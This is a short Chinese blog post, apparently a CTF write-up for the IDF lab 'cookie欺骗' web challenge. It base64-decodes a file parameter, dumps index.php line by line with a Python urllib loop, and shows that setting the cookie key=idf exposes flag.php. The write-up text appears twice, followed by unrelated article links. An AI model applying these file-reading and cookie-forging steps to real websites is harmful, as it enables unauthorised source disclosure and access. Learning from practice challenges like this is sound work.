idf cookie欺骗
2016-04-28 15:44
423 查看
http://ctf.idf.cn/game/web/40/index.php?line=&file=ZmxhZy50eHQ
打开后就一串长长的码 不知所云
注意到ZmxhZy50eHQ 估计是BASE64
查询 得到flag.txt
放进去啥都没(无言以对)
大牛说是文件包含漏洞(什么是文件包含漏洞?去百度百度)
把file=aW5kZXgucGhw(index.php的base64)line=1发现有代码
测试line发现有个18行
写一个python弄出全部代码(py3)
得到
也就是说设置cookie key=idf就行了
打开后就一串长长的码 不知所云
注意到ZmxhZy50eHQ 估计是BASE64
查询 得到flag.txt
放进去啥都没(无言以对)
大牛说是文件包含漏洞(什么是文件包含漏洞?去百度百度)
把file=aW5kZXgucGhw(index.php的base64)line=1发现有代码
测试line发现有个18行
写一个python弄出全部代码(py3)
import urllib.request i=0 while(i<20): file = urllib.request.urlopen("http://ctf.idf.cn/game/web/40/index.php?line=%d&file=aW5kZXgucGhw"% i).read() print(file.decode('utf-8')) i=i+1
得到
<?php error_reporting(0); $file=base64_decode(isset($_GET['file'])?$_GET['file']:""); $line=isset($_GET['line'])?intval($_GET['line']):0; if($file=='') header("location:index.php?line=&file=ZmxhZy50eHQ"); $file_list = array( '0' =>'flag.txt', '1' =>'index.php', ); if(isset($_COOKIE['key']) && $_COOKIE['key']=='idf'){ $file_list[2]='flag.php'; } if(in_array($file, $file_list)){ $fa = file($file); echo $fa[$line]; } ?>
也就是说设置cookie key=idf就行了
相关文章推荐
- C++this指针
- 知道这10个正则表达式,能让你少写1,000行代码
- # 微信公众号内支付(.Net版本)开发详尽流程分享
- iOS Core Data
- 静态数据成员和静态函数成员
- iOS一些疑惑点总结
- maven编译spark报PermGen space解决办法
- 无法将文件“..\obj\*.dll”复制“..\bin\*.dll”,对路径“..\bin\*.dll”的访问被拒绝
- 黄聪:PHP7.0中htmlspecialchars出错解决方案(wordpress)
- [更新]跨平台物联网通讯框架 ServerSuperIO v1.2(SSIO),增加数据分发控制模式
- jquery弹出遮掩层效果【附实例代码】
- Node.js 连接 MySQL 并进行数据库操作
- CentOS7上安装、配置、监控RabbitMQ
- BZOJ 4514|SDOI 2016|数字配对|筛法|费用流
- Android消息机制(Handler原理)
- php实现简单验证码并且验证
- 处理闪退日志
- Android换肤技术总结
- AVL树详解
- dedecms如何增加自定义字段